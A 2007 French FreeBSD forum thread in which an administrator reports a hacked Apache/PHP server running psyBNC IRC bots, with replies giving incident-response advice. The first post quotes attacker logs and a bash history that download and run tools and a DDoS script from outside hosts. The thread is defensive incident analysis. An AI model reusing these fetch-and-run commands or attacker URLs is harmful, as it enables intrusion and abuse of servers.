Forums FUG-FR - Problème avec apache

firebolt31

Full Member

Offline

Posts: 102
France
Gender: male

Problème avec apache
31. May 2007 at 17:33

Bonjour

voila j'ai un petit problème en ce moment sur un serveur avec apache.

Apparament il y a une faille de sécurité, car régulièrement le matin je me retrouve avec un daemon irc lancé sous le compte "www"

Voici ce que j'ai dans les logs apache:
c'ets dans le fichier /var/log/httpd-error.log
Quote:

Undefined subroutine &main::notice called at bot.txt line 174.
sysctl: unknown oid 'kernel.ostype'
sysctl: unknown oid 'kernel.osrelease'
sysctl: unknown oid 'kernel.ostype'
sysctl: unknown oid 'kernel.osrelease'
sysctl: unknown oid 'kernel.ostype'
sysctl: unknown oid 'kernel.osrelease'
sysctl: unknown oid 'kernel.ostype'
sysctl: unknown oid 'kernel.osrelease'
sysctl: unknown oid 'kernel.ostype'
sysctl: unknown oid 'kernel.osrelease'
sysctl: unknown oid 'kernel.ostype'
sysctl: unknown oid 'kernel.osrelease'
sysctl: unknown oid 'kernel.ostype'
sysctl: unknown oid 'kernel.osrelease'
x VNC_bypauth
sysctl: unknown oid 'kernel.ostype'
sysctl: unknown oid 'kernel.osrelease'
sysctl: unknown oid 'kernel.ostype'
sysctl: unknown oid 'kernel.osrelease'
sysctl: unknown oid 'kernel.ostype'
sysctl: unknown oid 'kernel.osrelease'
./VNC_bypauth: error while loading shared libraries: libstdc++.so.6: cannot open shared object file: No such file or directory
sysctl: unknown oid 'kernel.ostype'
sysctl: unknown oid 'kernel.osrelease'
sysctl: unknown oid 'kernel.ostype'
sysctl: unknown oid 'kernel.osrelease'
sysctl: unknown oid 'kernel.ostype'
sysctl: unknown oid 'kernel.osrelease'
./VNC_bypauth: error while loading shared libraries: libstdc++.so.6: cannot open shared object file: No such file or directory
--19:34:53-- http://alienr0x.by.ru/.ddos.pl
=> `.ddos.pl'
Resolving alienr0x.by.ru... 217.16.29.51
Connecting to alienr0x.by.ru|217.16.29.51|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 11,100 (11K) [text/plain]

0K .......... 100% 25.94 KB/s

19:35:03 (25.94 KB/s) - `.ddos.pl' saved [11100/11100]

Et voila ce que j'ai dans le fichier .bash_history qui se trouve dans /var/tmp
Quote:

id
cd /tmp
tar -zvxf psy.tar.gz
./config dtr 8888
cd .psy
./config dtr 9090
./crappity smack
./run
cd /tmp
ls -a
wget http://www.chanary.net/tools/psy.tar.gz
tar -zvxf psy.tar.gz
cd .psy
./config dtr 9090
./crappity smack
./run
ls -a
cd /tmp
ls -a
uname -a
./f3
rm crond
ls -a
uname -a
id

D'aprézs mes recherche c'est psybnc, un bot irc.

le problème c'est que j'ai tout passé en dernière version (apache, perl, php) et je vois pas ou ils pourraient Sad

Vous auriez uen idée ?

Merci d'avance.

Back to top

IP Logged

fgudin Global Moderator Offline PouetPouetBSD roul3z Posts: 1552 Thonon (74) Gender:	Re: Problème avec apache Reply #1 - 31. May 2007 at 18:10 1- sortir le serveur de prod 2- retrouver ces précieuses sauvegardes 3- RAZ du serveur et réinstallation 4- restauration des données 5- remise en prod
Back to top	Tintin à Redmond IP Logged

jc1 God Member Offline BSD For Ever !! Posts: 845 Un coin en France Gender:	Re: Problème avec apache Reply #2 - 31. May 2007 at 18:36 Bonjour, Est-ce qu'il existe des détecteurs de rootkit sous FreeBSD ? Si oui, je passerai un petit coup pour voir s'ils détectent qqchose. cela serait pour voir s'il n'y apas autres choses de touché. Autrement, +1 méthode francis
Back to top	"Ils ignoraient que c'était impossible, alors ils l'ont fait" Marc Twain "Do or do not. There is no try" Yoda Senseï WWW IP Logged

firebolt31

Full Member

Offline

Posts: 102
France
Gender: male

Re: Problème avec apache
Reply #3 - 31. May 2007 at 18:44

Le problème c'ets que je voudrais bien m'affranchir de cette etape de justement tout re-installer

j'ai fait un check de tous les fichiers créés ou accédés récement et j'ai suprimer tout ce qu'il avait pu mettre.

c'etait dans /tmp et /var/tmp

des dossiers avec a l'intérieur les sources pour compiler etc....
les dossiers etaient:
.psy
.f3
.iroserv
.iroircf

Bref la tout est propre, j'ai remis a zero les log apache et les log système pour voir par ou ils peuvent bien passer Sad

Back to top

IP Logged

Marck God Member Offline I Love New YaBB Posts: 1113	Re: Problème avec apache Reply #4 - 31. May 2007 at 19:07 jc1, un début de réponse ici avec rkhunter: https://forums.fug-fr.org/cgi-bin/yabb2/YaBB.pl?num=1158320051 mais je n'y connais vraiment rien.
Back to top	WWW IP Logged

fgudin

Global Moderator

Offline

PouetPouetBSD roul3z

Posts: 1552
Thonon (74)
Gender: male

Re: Problème avec apache
Reply #5 - 31. May 2007 at 20:27

firebolt31 wrote on 31. May 2007 at 18:44:

Le problème c'ets que je voudrais bien m'affranchir de cette etape de justement tout re-installer

Je comprend, mais c'est pourtant le plus sûr et, sans doute, le plus rapide pour retrouver un serveur *digne de confiance*: les outils de détection de rootkit ne sont pas infaillibles (aussi fiables que les antivirus).
D'autant plus que tu ne connais pas le moyen par lequel le contrôle a été pris (la porte est peut-être encore grande ouverte), ni l'étendue de l'intrusion (root ?).

Après, c'est comme tu sens; n'oublie pas, par contre, que si ton système sert de vecteur d'attaque (...ddos.pl dans ton error-log apache, notamment), tu es responsable.

Un peu de lecture à propos de ça:

Back to top

Tintin à Redmond

IP Logged

Sheltem

Full Member

Offline

Freebsders Powa

Posts: 118
Bons En Chablais Haute-Savoie
Gender: male

Re: Problème avec apache
Reply #6 - 31. May 2007 at 21:26

Juste histoire d'appuyer la réponse de francis...

J'ai moi même été victime de ce genre d'attaque, des psybnc étaient lancés sur ma machine et servaient visiblement à tous un tas de gens de passerelle pour se connecté au réseau IRC QuakeNet.

Eliminer les sources que tu as trouvés dans /tmp me paraît inutile, tous un tas de binaires systèmes on pu être modifiés/remplacés pour laisser une porte d'entrée béante ouverte sur ta machine et leur permettrent de revenir sans même ré-exploiter la première faille trouvé. De plus les binaires les plus courant comme ps, top, netstat on pu être remplacé par des versions qui n'affichent pas les process ou connexion qu'ils utilisent (c'est ce qui s'est passé pour moi)

Donc comme Francis la dis, ne cherche pas, ta machine et déja corrompu et rien ne pourra plus t'assurer qu'elle est "secure".

si jamais, après la nouvelle install, monte ton dossier /tmp avec l'option "noexec", ça fait pas tout, mais arrête déja pas mal de rootkit.

Back to top

WWW

IP Logged

shes

Global Moderator

Offline

Et qemu c'est du flan?

Posts: 178
Geneva
Gender: male

Re: Problème avec apache
Reply #7 - 31. May 2007 at 21:27

Je doute qu'il y est un trou de sécurité dans apache. Par contre, tu tournes surement un forum ou une application du genre que tu n'a pas mis à jour.
Comme le dit francis, la seule solution est la réinstallation complète du système.
En cas d'intrusion, tu ne peux plus faire confiance à ton système.

Il serait intéressant d'isoler ta machine pour quelques temps et d'analyser un peu plus la situation.

Bon courage.

Back to top

&&Dirty Freebsd: http://www.freebsders.org/.

WWW

IP Logged

Dumpy

Senior Member

Offline

Posts: 313
GEMENOS
Gender: male

Re: Problème avec apache
Reply #8 - 01. Jun 2007 at 16:24

Une idée ?
Dans Apache, on peut rajouter un module " mod_security ", qui filtre les problèmes et attaques dus aux applications (PHP, extc....).
Dans le cas présent, on pourrait rajouter une ligne dans le ruleset de mod_security:
# Block various methods of downloading files to a server "
- - --
SecFilterSelective THE_REQUEST "psybnc "
- - -- - -
extc......

Par ailleurs, il n'est pas sur que l'attaquant utilise la machine pour autre chose, mais en temps que root, il peut ausssi avoir modifié l'affichage de ps pour rester invisible, et déclencher des problèmes autres qu'informatiques.
Mais enfin, en prod, je serais tenté de rejoindre l'avis de francis, sachant que les back-ups peuvent etre vérolés aussi.

Back to top

Dumpy

IP Logged

firebolt31

Full Member

Offline

Posts: 102
France
Gender: male

Re: Problème avec apache
Reply #9 - 01. Jun 2007 at 16:52

Mon problème est le suivant

La machine etait parfaitement à jour de tous ces patchs, j'y passe un jour par semaine pour tout vérifier et mettre tous els composants à jour.

Donc ils ont réussi a passer malgré une machien à jour donc avant de refaire une machine complète (ce quie st effectivement le plus ainsi que le changement de tous les accés connus sur cette machine), je voudrais trouver avec certitude par ou ils sont passés

parce que admettons que ce week-en dje refasse la machine, elle sera configuré comme avant et si lundi matin ca recommence ben je serais aussi "bete" qu'avant

J'ai passé un coup de rkhunter et la seule chose qu'il a détecté c'est la version de openssl qui n'était pas à jour d'une version mineure Sad

Back to top

IP Logged

shes Global Moderator Offline Et qemu c'est du flan? Posts: 178 Geneva Gender:	Re: Problème avec apache Reply #10 - 01. Jun 2007 at 18:15 10 euros que tu tournes php dessus. Peux-tu nous lister les applications web qui sont disponible sur ton serveur web?
Back to top	&&Dirty Freebsd: http://www.freebsders.org/. WWW IP Logged

Dumpy

Senior Member

Offline

Posts: 313
GEMENOS
Gender: male

Re: Problème avec apache
Reply #11 - 01. Jun 2007 at 22:06

Et pour un € de plus, je suis allé sur http://alienr0x.by.ru/ mentionné dans le post de firebolt31, il me semble qu'il y a là tout ce qu'il faut comme exploits, rootkits, backdoors, pour les Linux et les BSD et autres serveurs, mais beaucoup sont précompilés. Y a des trucs vraiment méchants ( quand on peut les lire), ou avec Hotmail extc... Cry

Attention, certains cherchent à se connecter !

Bon, je va au dodo...

Back to top

« Last Edit: 01. Jun 2007 at 22:13 by Dumpy »

Dumpy

IP Logged

jc1 God Member Offline BSD For Ever !! Posts: 845 Un coin en France Gender:	Re: Problème avec apache Reply #12 - 03. Jun 2007 at 20:36 Bonjour, Un complément au chasseur de rootkit http://www.rootkit.nl/projects/rootkit_hunter.html ici : http://www.nongnu.org/tiger/
Back to top	"Ils ignoraient que c'était impossible, alors ils l'ont fait" Marc Twain "Do or do not. There is no try" Yoda Senseï WWW IP Logged

firebolt31

Full Member

Offline

Posts: 102
France
Gender: male

Re: Problème avec apache
Reply #13 - 04. Jun 2007 at 09:07

Alors pour les applis ben v que c'ets un frontal web, il y a apache, php, webmin et ssh qui tourne dessus

Donc effectivement il y a php et j'ai trouvé le problème.

Un formulaire de soumission de document mal voir carrement pas protégé du tout Sad

Et dire qu'on a payé un max pour la conception de ce site Sad

Bon en tout cas j'y ai passé mon week-end dessus.
Résultat j'ai changé tous les accés au serveur, patché tout ce qui pouvait être encore patchable a dimanche aprem.
Passé plusieurs anti-rootkit.

Si je peux m'affranchir de la re-install ca m'arrangerais.

Apparament depuis hier plus d'instrusion sur le serveur ni de lancement des bots.

je vais le surveiller pendant la semaine pour voir ce qui se passe.

j'ai aussi fait des règles sur le firewall pour interdire complètement les ips de ces sites et les ips que j'ai pu trouver dans leurs scripts.

En tout cas merci de vos précieux conseils.

Back to top

IP Logged

shes Global Moderator Offline Et qemu c'est du flan? Posts: 178 Geneva Gender:	Re: Problème avec apache Reply #14 - 04. Jun 2007 at 09:32 Que fait webmin sur ton serveur web?
Back to top	&&Dirty Freebsd: http://www.freebsders.org/. WWW IP Logged

	Welcome, Guest. Please Login